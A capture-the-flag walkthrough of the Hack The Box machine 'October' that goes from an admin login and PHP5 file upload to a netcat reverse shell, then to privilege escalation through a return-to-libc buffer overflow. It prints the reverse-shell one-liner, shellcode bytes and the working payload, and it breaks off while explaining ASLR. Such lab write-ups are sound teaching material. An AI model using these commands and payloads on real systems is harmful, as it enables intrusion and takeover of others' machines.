October — HTB Walkthrough

7 min readJul 15, 2020

--

Buffer Overflow — — but not using Shellcode. Great box, learnt a lot about ASLR , NX bytes and return-to-libc trick to bypasss code and gain shell. LET’S BEGIN.

ENUMERATION

Nmap Scan

Port 80 HTTP Enumeration

visiting website I found Login and register page

Registering with Username: n00bDi password:abcdabcd . Cannot find much on website. So decided to run a dirbuster scan

Traversing to backend

Signing in as admin:admin worked. If you don’t get it how, you can run Hydra too. It was a guess word with usual creds. We get admin dashboard

We see we can upload malicious contents using any of these

Uploading php using media. Capture request on burp and change php to php5 as hinted by dr.ph5

EXPLOITATION

Uploading the file with changes told above.

We see a public URL is given aside on this page to traverse to abcd.php5, keep msf exploit/multi/handler on, if you have used above payload to get reverse shell. Else , you can also use this as payload in abcd.php5

Keep netcat on at port 1234 , and in URL you can abuse cmd as follows

Getting shell.

Using pentest monkey reverse shell using netcat, send URL encoded input to CMD =

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.16 1234 >/tmp/f

And on netcat we see

PRIVILEGE ESCALATION

Looking for SUID

We see here a file named ovrflw. Lets see what code it contains

Okh this might be vulnerable to Buffer Overflow. And why not it uses strcpy, also its name suggests so. Doing ltrace to see what and how input goes

Let’s copy this to our machine, using nc.

Running file on gdb and disassembling main function

1) FUZZING

2) Finding offset

We see it lies between 110 to 120. So keeping length = 120 we will create a pattern using metasploit-framework

Now send this instead of A’s

This we will pass as argument to pattern_offset script to determine exact offset

We find this at 112.

3) Overwriting the EIP

Checking value at EIP register, we see it is filled with Bs’

Checking EIP address

So now we will set a breakpoint at 0xfff4adbc and check if it hits

4) Shellcode

Using msfvenom we will create a shellcode

5) Sending payload

Using some padding we will send our shellcode and offset as a payload. For this we write shell.py

Here we are sending EIP = “A”s so that we can detect it easily on machine. Now take this script to target machine, using python server , in /tmp of target machine. Then on target machine in /usr/local/bin

Now we will analyze EIP register to get address

We see our shellcode starts at 0xbfd4397d , so we will change EIP to somewhere in mid of \x90s == 0xbfd43970

python -c ‘offset = 112;shell=””;shell +=”\xdb\xde\xd9\x74\x24\xf4\x5e\x2b\xc9\xb1\x12\xbf\xff\xee\x16";shell +=”\x49\x83\xee\xfc\x31\x7e\x13\x03\x81\xfd\xf4\xbc\x4c\xd9\x0e”;shell +=”\xdd\xfd\x9e\xa3\x48\x03\xa8\xa5\x3d\x65\x67\xa5\xad\x30\xc7";shell +=”\x99\x1c\x42\x6e\x9f\x67\x2a\x7b\x55\x96\xba\x13\x6b\xa6\xab”;shell +=”\xbf\xe2\x47\x7b\x59\xa5\xd6\x28\x15\x46\x50\x2f\x94\xc9\x30";shell +=”\xc7\x49\xe5\xc7\x7f\xfe\xd6\x08\x1d\x97\xa1\xb4\xb3\x34\x3b”;shell +=”\x70\x39\xd4\xbf”;nop = “\x90”*(offset — len(shell));eip = “\xe4c\xfd\x95\xbf”;payload = nop + shell + eip;print(payload);’

It was continuously giving segmentation fault. Something was wrong so I checked it on target machine

also checking permission on file, as if why we cannot run the shellcode

NX enabled ; no execution : means I cannot run shellcode here. Then what.

Its an exploit mitigation technique which makes certain areas of memory non executable and makes an executable area, non writable. Example: Data, stack and heap segments are made non executable while text segment is made non writable.

With NX bit turned on, our classic approach to stack based buffer overflow will fail to exploit the vulnerability. Since in classic approach, shellcode was copied into the stack and return address was pointing to shellcode. But now since stack is no more executable, our exploit fails!! But this mitigation technique is not completely foolproof, hence in this post lets see how to bypass NX Bit!!

NX bit can be bypassed using an attack technique called “return-to-libc”. Here return address is overwritten with a particular libc function address (instead of stack address containing the shellcode). For example if an attacker wants to spawn a shell, he overwrites return address with system() address and also sets up the appropriate arguments required by system() in the stack, for its successful invocation.[1]

Return to libc: is a method of exploiting a buffer overflow on a system that has a non-executable stack, it is very similar to a standard buffer overflow, in that the return address is changed to point at a new location that we can control

Now to check memory address of libc we can do following[2]

Checking memory address of libc, /bin/sh, system and exit outside gdb.

Calculation

System: 0xb7582000+0x40310=0xB75C2310

Exit: 0xb7582000+0x33260=0xB75B5260

/bin/sh : 0xb7582000+0x162bac =0xB76E4BAC

Format : Offset*NOP bytes + System + Exit + /bin/sh

payload : $(python -c ‘print(“\x90”*112 + “\x10\x23\x5c\xb7” + “\x60\x52\x5b\xb7” + “\xac\x4b\x6e\xb7”)’);

We could have directly executed

/usr/local/bin/ovrflw $(python -c ‘print(“\x90”*112 + “\x10\x23\x5c\xb7” + “\x60\x52\x5b\xb7” + “\xac\x4b\x6e\xb7”)’);

But we get core dumped because ASLR is enabled. So we need to loop over

Address Space Layout Randomization (ASLR) is primarily used to protect against buffer overflow attacks. In a buffer overflow, attackers feed a function as much junk data as it can handle, followed by a malicious payload. The payload will overwrite data the program intends to access[3]

How ASLR works? ASLR increases the control-flow integrity of a system by making it more difficult for an attacker to execute a successful buffer-overflow attack by randomizing the offsets it uses in memory layouts